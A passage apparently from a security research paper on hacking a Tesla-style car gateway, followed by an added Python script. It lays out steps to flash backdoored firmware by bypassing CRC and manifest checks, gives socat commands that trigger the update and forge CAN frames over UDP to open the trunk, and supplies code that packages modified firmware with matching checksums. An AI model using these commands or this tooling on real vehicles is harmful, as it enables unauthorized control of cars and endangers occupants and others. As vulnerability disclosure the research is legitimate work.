A function pointer to the routine that processes and flashes the file. For most entries it is 0x40029B1C, which we named pektronUpdate.
Configuration flags, for example whether the BMS should be opened.
Although there are some differences between files, they mainly follow this procedure:
a) Convert the hex file into a binary stream;
b) For certain files, check that the file meets the requirements;
c) Do some preparation work, including switching off dangerous relays, switching off the battery, etc.;
d) Send the firmware using the UDS protocol. In most situations the updater is only responsible for
downloading the target hex to the chip; it does not care whether the hex file is corrupted or not. The bootloader
on the target chip is required to write the hex file into flash and to check whether the application is valid every
time it boots up;
e) Check that the firmware has been sent to the target ECU and has been programmed completely.
4. After all those files have been processed, write a log, then restart.
Besides, flashing the gateway itself is even easier, since the updater runs on the same target chip: it
just needs to unlock the flash block, write the new data and re-lock it, following the manual of the
chip.
So here are our steps for flashing customized firmware to the gateway:
1. Modify the firmware into our customized version. To prove that we can do it, we changed the CRC value of
ic.hex to 0xDEADBEEF, and also modified gtw.hex to open a backdoor, so that we can send any frame
on the CAN bus even while the car is running (discussed later).
2. Recalculate the CRC value, or use some method to generate collisions, which might be a wise choice
for evading hidden security checks.
3. Change the manifest's content and its CRC value. Alternatively, you can just make some modifications to
boot.img in order to skip part of the verification process.
4. Pack those files into release.tgz and append the corresponding CRC32 value.
5. Transfer booted.img, release.tgz and service.upd to the gateway.
6. printf "\x08booted.img" | socat - udp:gw:3500
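The packaging side of the procedure above, as an added example (not Keen Lab's tooling and not code from the paper): it converts an Intel HEX file into the flat binary the updater writes (step a of the updater procedure), packs files into release.tgz with a trailing CRC32 (step 4) and forms the datagram of step 6. The Intel HEX record layout is the public format; the sample hex records are constructed here; the CRC32 polynomial (zlib/IEEE) and the 4-byte little-endian trailer byte order are assumptions, since the paper only says the CRC32 is appended.

```python
"""Added example: Intel HEX to binary, release.tgz with CRC32 trailer, update trigger.
Not the paper's tooling. CRC polynomial and trailer byte order are assumptions."""
import io
import socket
import tarfile
import zlib

# Constructed sample Intel HEX: extended linear address record, two data
# records separated by a 4-byte gap, then the EOF record.
SAMPLE_HEX = """
:020000040000FA
:04000000DEADBEEFC4
:02000800CAFE2E
:00000001FF
"""


def ihex_to_bin(text, fill=0xFF):
    """Turn an Intel HEX file into a flat image starting at its lowest address.

    Handles record types 00 (data), 01 (EOF), 02 (extended segment address)
    and 04 (extended linear address). Gaps are filled with `fill` (erased
    flash). Every record checksum is verified, so a corrupted file is
    rejected here instead of being handed to the target's bootloader.
    """
    image = {}
    base = 0
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if not line.startswith(":"):
            raise ValueError("not an Intel HEX record: %r" % line)
        raw = bytes.fromhex(line[1:])
        if sum(raw) & 0xFF:  # all bytes including the checksum sum to 0 mod 256
            raise ValueError("record checksum mismatch: %r" % line)
        length, addr, rtype = raw[0], int.from_bytes(raw[1:3], "big"), raw[3]
        data = raw[4:4 + length]
        if len(data) != length:
            raise ValueError("truncated record: %r" % line)
        if rtype == 0x00:
            for i, b in enumerate(data):
                image[base + addr + i] = b
        elif rtype == 0x01:
            break
        elif rtype == 0x02:
            base = int.from_bytes(data, "big") << 4
        elif rtype == 0x04:
            base = int.from_bytes(data, "big") << 16
        elif rtype in (0x03, 0x05):
            continue  # start-address records carry no image data
        else:
            raise ValueError("unsupported record type 0x%02x" % rtype)
    if not image:
        return b""
    lo, hi = min(image), max(image)
    return bytes(image.get(a, fill) for a in range(lo, hi + 1))


def crc32_trailer(data):
    """CRC32 (zlib/IEEE) as a 4-byte little-endian trailer (byte order assumed)."""
    return zlib.crc32(data).to_bytes(4, "little")


def build_release(files):
    """Pack {name: content} into a release.tgz image and append its CRC32."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name in sorted(files):
            info = tarfile.TarInfo(name)
            info.size = len(files[name])
            tar.addfile(info, io.BytesIO(files[name]))
    tgz = buf.getvalue()
    return tgz + crc32_trailer(tgz)


def check_release(blob):
    """Recompute the CRC32 over everything but the last 4 bytes and compare."""
    return len(blob) > 4 and crc32_trailer(blob[:-4]) == blob[-4:]


def update_trigger(image_name="booted.img"):
    """The datagram of step 6: the 0x08 byte followed by the image name."""
    return b"\x08" + image_name.encode()


def send_udp(payload, host, port):
    """Python equivalent of `printf ... | socat - udp:host:port`."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.sendto(payload, (host, port))


if __name__ == "__main__":
    image = ihex_to_bin(SAMPLE_HEX)
    print("flat image: %s (%d bytes)" % (image.hex(), len(image)))
    # File names as in the paper; contents here are the constructed sample.
    blob = build_release({"ic.hex": SAMPLE_HEX.encode()})
    print("release.tgz+crc: %d bytes, trailer ok: %s" % (len(blob), check_release(blob)))
    # After copying booted.img, release.tgz and service.upd to the gateway:
    # send_udp(update_trigger(), "gw", 3500)
```

If the real trailer turns out to be big-endian or to cover a different range, only crc32_trailer and check_release change; the rest of the pipeline is unaffected.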
By using these techniques to skip the update verification process and program our customized code
into ECUs, we can now run our code permanently on an ECU if we want. Some other potential problems
are still under investigation, including the possibility of flashing the bootloader, modifying the car's configuration and
other software-related tasks.
GATEWAY REVERSE ENGINEERING AND HACKING
We found vulnerabilities in several important tasks running on the gateway, which can perform almost any
kind of communication with the ECUs on the CAN bus. They are listed as follows:
1. Because the gateway by design treats UDP broadcasts on ports 20100 and 20101 as CAN
messages and forwards them to the real CAN bus, we can easily forge UDP packets to trigger
actions such as lock or unlock. For example, we send the following UDP packet to open the trunk:
printf "\x00\x00\x02\x48\x04\x00\x30\x07\x00\xFF\xFF\x00" | socat - udp:gw:20100